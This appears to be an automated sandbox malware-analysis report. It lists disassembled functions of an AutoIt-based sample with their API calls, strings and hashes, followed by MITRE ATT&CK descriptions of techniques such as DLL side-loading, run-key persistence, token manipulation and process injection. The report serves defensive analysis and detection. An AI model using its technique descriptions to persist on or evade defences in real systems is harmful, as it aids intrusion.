Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 657d48de9c11682212e3e377a1de0d59950fa6c95062ca280796b87f979a72a9
Instruction ID: 9a0601400bf11409da5feffbb13b9bff1e79755307e0baa77980ad1ebdf56372
Opcode Fuzzy Hash: 657d48de9c11682212e3e377a1de0d59950fa6c95062ca280796b87f979a72a9
Instruction Fuzzy Hash: C711B2723042087FFF259F98DC80EBF376EEB94364F108529F92897290D6319D519760

Function 00993710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0090600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0090604C
Part of subcall function 0090600E: GetStockObject.GDI32(00000011), ref: 00906060
Part of subcall function 0090600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0090606A

GetWindowRect.USER32(00000000,?), ref: 0099377A
GetSysColor.USER32(00000012), ref: 00993794

Strings

static, xrefs: 00993757

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 3a359b70d43f8851a6b917b3a8bdfe3d70cc5eb9f0902acbbe55eb50c3552c40
Instruction ID: 13fcc621b82f57f131e5411135c2520a1aae79300c8d1acda5f3ead2f59b0b61
Opcode Fuzzy Hash: 3a359b70d43f8851a6b917b3a8bdfe3d70cc5eb9f0902acbbe55eb50c3552c40
Instruction Fuzzy Hash: 691126B261020AAFDF00DFA8CC46AEA7BB8EB08314F004915F955E2250E735E8619B60

Function 0097CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0097CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0097CDA6

Strings

<local>, xrefs: 0097CD66

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 700d8a32b6bc3e6811a25dfb517f6300c1ae9af1538db17d36d0574f5cf11a77
Instruction ID: eecf98ecd4a9da30945117f3168087d1ced59290ac32f1e5b94f94ceb3df4af7
Opcode Fuzzy Hash: 700d8a32b6bc3e6811a25dfb517f6300c1ae9af1538db17d36d0574f5cf11a77
Instruction Fuzzy Hash: A711A0B2215631BAD7384AA68C49EE7BEACEB527A4F00862EB10D931C0D6649840D6F0

Function 00993429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 009934AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009934BA

Strings

edit, xrefs: 0099348F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: bd76ff2ebf673c85a036ae9f874868127267bf33e2c4913091d6f96db937656f
Instruction ID: 7bd40fba1353529c68fc3f1bb8b0d036e3a32038f27b00f5aace0f64b50cb977
Opcode Fuzzy Hash: bd76ff2ebf673c85a036ae9f874868127267bf33e2c4913091d6f96db937656f
Instruction Fuzzy Hash: 64118F71110108AFEF118F68DC44AAB37AEEB45378F518724F965931E0C775EC91A760

Function 00966C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

CharUpperBuffW.USER32(?,?,?), ref: 00966CB6
_wcslen.LIBCMT ref: 00966CC2

Strings

STOP, xrefs: 00966CBC, 00966CC1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 9cef5df00bbb95c6ae870a64dedaa0334af2703c9bd384d1000b86a2ffe0fd3f
Instruction ID: 9e2dda8deedd6e239de7e99e983676bc9e45922030883de5d11bdbd1587cd83d
Opcode Fuzzy Hash: 9cef5df00bbb95c6ae870a64dedaa0334af2703c9bd384d1000b86a2ffe0fd3f
Instruction Fuzzy Hash: 0C01D632A109278BCB209FBDDC90ABF77B9EFA17507500928E9A2971D5EB35D940C650

Function 00961CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Part of subcall function 00963CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00963CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00961D4C

Strings

ComboBox, xrefs: 00961CEB
ListBox, xrefs: 00961D16

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 12b9cbc6d54f3a4cd5e2db0030dabfed0e56654067b4d6611fe601079a410aa2
Instruction ID: e2edc5613fec739d408ee5d163d0842fb89726feb58e9b08d16cd795030c3231
Opcode Fuzzy Hash: 12b9cbc6d54f3a4cd5e2db0030dabfed0e56654067b4d6611fe601079a410aa2
Instruction Fuzzy Hash: CD01D871A01214ABCB08EBA4CD61EFE7768EB96350F04491AF866573C2EA3459089760

Function 00961BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Part of subcall function 00963CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00963CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00961C46

Strings

ComboBox, xrefs: 00961BE5
ListBox, xrefs: 00961C10

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6e20ff10892e3c284f77d25c7f500c397623761bb1c1344cffcc504f453c0afa
Instruction ID: 2d3ae3c123bd0bc055547e95ebd985c7f803c20dfd19225122f5495bfc8596c2
Opcode Fuzzy Hash: 6e20ff10892e3c284f77d25c7f500c397623761bb1c1344cffcc504f453c0afa
Instruction Fuzzy Hash: A001A775A811146BDB04EB90CD52FFF77AC9B91340F14001AB986672C2EA289E18D6B1

Function 00961C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Part of subcall function 00963CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00963CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00961CC8

Strings

ComboBox, xrefs: 00961C69
ListBox, xrefs: 00961C94

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: aea2704f4027bdb62d7da8464deaab386bfe8755036510c8ac656402b1d8569f
Instruction ID: 7c89cf6b4da26015287946d73be6a4ab61b8375fa365aa169ca82ab0871d56bc
Opcode Fuzzy Hash: aea2704f4027bdb62d7da8464deaab386bfe8755036510c8ac656402b1d8569f
Instruction Fuzzy Hash: E601DBB1E401146BDB04E794CE01FFF77AC9B51340F144415BC86732C2EA289F08D671

Function 00961D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Part of subcall function 00963CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00963CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00961DD3

Strings

ComboBox, xrefs: 00961D75
ListBox, xrefs: 00961DA0

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 46319b605877e6776fa664680ddcb2bba3be07353e15b9dc9399af08ec6f0391
Instruction ID: f45d2a9b6ad963a717cb2bc4a478ea70a2632f01bbf9d62b37cb29e3c00f9873
Opcode Fuzzy Hash: 46319b605877e6776fa664680ddcb2bba3be07353e15b9dc9399af08ec6f0391
Instruction Fuzzy Hash: 45F0C871F512146BDB04F7A4CC62FFF777CAB81350F08091AB862632C2DA6469088361

Function 0098747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00987493
_wcslen.LIBCMT ref: 009874B9

Strings

3, 3, 16, 1, xrefs: 00987483

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: f335eae7ba5c44cffbacb4c85cc63755251acf009f42222dec2b7ed214ba28ac
Instruction ID: fd41f36301d4ed0e0a573459067e8cd1ec6a4d9cd083d20a819ff1016685a3d7
Opcode Fuzzy Hash: f335eae7ba5c44cffbacb4c85cc63755251acf009f42222dec2b7ed214ba28ac
Instruction Fuzzy Hash: DDE0E50660422010923122FAACC1B7F968ECEC5B90724182AF985C237AEA94CDD193A1

Function 00960B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00960B23

Strings

AutoIt, xrefs: 00960B17
Error allocating memory., xrefs: 00960B1C

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 1378ab53c2fa79f335b158ba99e08b798145db8ff45173bd35dad8cf70b38955
Instruction ID: 18bf28d810c2caa13df2eb5395c876df4034b3ab2e6080b0ea1081a9ce72d925
Opcode Fuzzy Hash: 1378ab53c2fa79f335b158ba99e08b798145db8ff45173bd35dad8cf70b38955
Instruction Fuzzy Hash: 9EE0D83134831C3AD61437987C03FC97A848F45B14F10042AF798554C38BE1249006B9

Function 00920D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0091F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00920D71,?,?,?,0090100A), ref: 0091F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0090100A), ref: 00920D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0090100A), ref: 00920D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00920D7F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 81da9ab87222184aef57f87c01a2326b1147246a53c86f5f2756465c11259cf8
Instruction ID: f80ff3ae23f01960e40bd1ee7caed3472e30b4dd5532f9d71d416748dbc528ea
Opcode Fuzzy Hash: 81da9ab87222184aef57f87c01a2326b1147246a53c86f5f2756465c11259cf8
Instruction Fuzzy Hash: EAE092B02013118FDB309FBCE80434ABBE4AF44744F00492EE492C7696DBB0E484CBA1

Function 0095D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0095D220

Strings

X64, xrefs: 0095D2A8
%.3d, xrefs: 0095D22B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 42a3758ede3c2472077f7791a611e85dbf9657560d78df155014a6d9a0e3915b
Instruction ID: fc36c4f9eedf308bd88092dbe1d57bd5aa3815cbd35df9db07bd6ee480b0fd9a
Opcode Fuzzy Hash: 42a3758ede3c2472077f7791a611e85dbf9657560d78df155014a6d9a0e3915b
Instruction Fuzzy Hash: D8D012B1D0E10CE9CB60D7D1DC459F9B37CAB48302F508856FC26A1040D62CD54CAB62

Function 00992322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0099232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0099233F

Part of subcall function 0096E97B: Sleep.KERNEL32 ref: 0096E9F3

Strings

Shell_TrayWnd, xrefs: 00992325

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9479c38c32b95c8f42ddee1f8061421f9de8fbd2208796e88e96e2a16e2a20ea
Instruction ID: 7456e7f1682ac37ee7ecc261819c72b6d531405d757c83d4b869a5b0aee3f7ae
Opcode Fuzzy Hash: 9479c38c32b95c8f42ddee1f8061421f9de8fbd2208796e88e96e2a16e2a20ea
Instruction Fuzzy Hash: BFD022763A8300B7E764B330DC0FFC67A249F40B00F00091B7305AA0D0C8F0A800CA04

Function 00992356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0099236C
PostMessageW.USER32(00000000), ref: 00992373

Part of subcall function 0096E97B: Sleep.KERNEL32 ref: 0096E9F3

Strings

Shell_TrayWnd, xrefs: 00992365

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 24ae07f705f516b3e3daca8fc000f69aa529a71801816859adac9fa1f1d07daf
Instruction ID: 5503dbc9d6f153955823f60a058abaf89f1806ccf211f10b38f92c178c2692a3
Opcode Fuzzy Hash: 24ae07f705f516b3e3daca8fc000f69aa529a71801816859adac9fa1f1d07daf
Instruction Fuzzy Hash: 35D0A9723983007AE664A3309C0FFC666249B44B00F00091A7201AA0D0C8A0A8008A08

Function 0093BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0093BE93
GetLastError.KERNEL32 ref: 0093BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0093BEFC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 818e4b60047fbad6760d1d930cf71eb85d029e9807ac698d46102d1ac67b3cf7
Instruction ID: dd0c41c75f5da784ee1db289ddb9d82a5033ce76d4b2b7e8260a37dc5bfbdc46
Opcode Fuzzy Hash: 818e4b60047fbad6760d1d930cf71eb85d029e9807ac698d46102d1ac67b3cf7
Instruction Fuzzy Hash: EC41E634604216EFDF31AF68DC54BBA7BA9EF42710F14516AFA599B1A1DB308D00DF60

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

